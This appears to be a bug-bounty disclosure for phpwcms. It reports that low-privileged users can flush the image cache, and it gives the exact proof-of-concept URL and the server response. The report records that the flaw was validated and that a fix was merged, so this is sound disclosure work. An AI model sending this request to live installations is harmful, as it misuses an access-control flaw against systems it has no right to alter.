Forced Browsing in slackero/phpwcms

Valid

Reported on

Sep 1st 2021


✍️ Description

Image cache can be flushed by any authenticated, low privileged user.

🕵️‍♂️ Proof of Concept

  • Register a low privileged user without any administrator access.
  • Log in with the low privileged user
  • Open the following URL:
    https://[SERVERADDRESS]include/inc_act/ajax_connector.php?action=flush_image_cache&value=1
  • The response from the server is 200-OK, what means the image cache has been flushed
HTTP/1.1 200 OK
Date: Wed, 01 Sep 2021 10:12:53 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1
X-Powered-By: PHP/8.0.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 30
Connection: close
Content-Type: application/json

{"file_count":0,"status":"ok"}

💥 Impact

A malicious actor is able to flush the cache of the application's image management.

We have contacted a member of the slackero/phpwcms team and are waiting to hear back 3 months ago
Oliver Georgi validated this vulnerability 3 months ago
TheLabda has been awarded the disclosure bounty
The fix bounty is now up for grabs
Oliver Georgi confirmed that a fix has been merged on 3bc4e7 3 months ago
Oliver Georgi has been awarded the fix bounty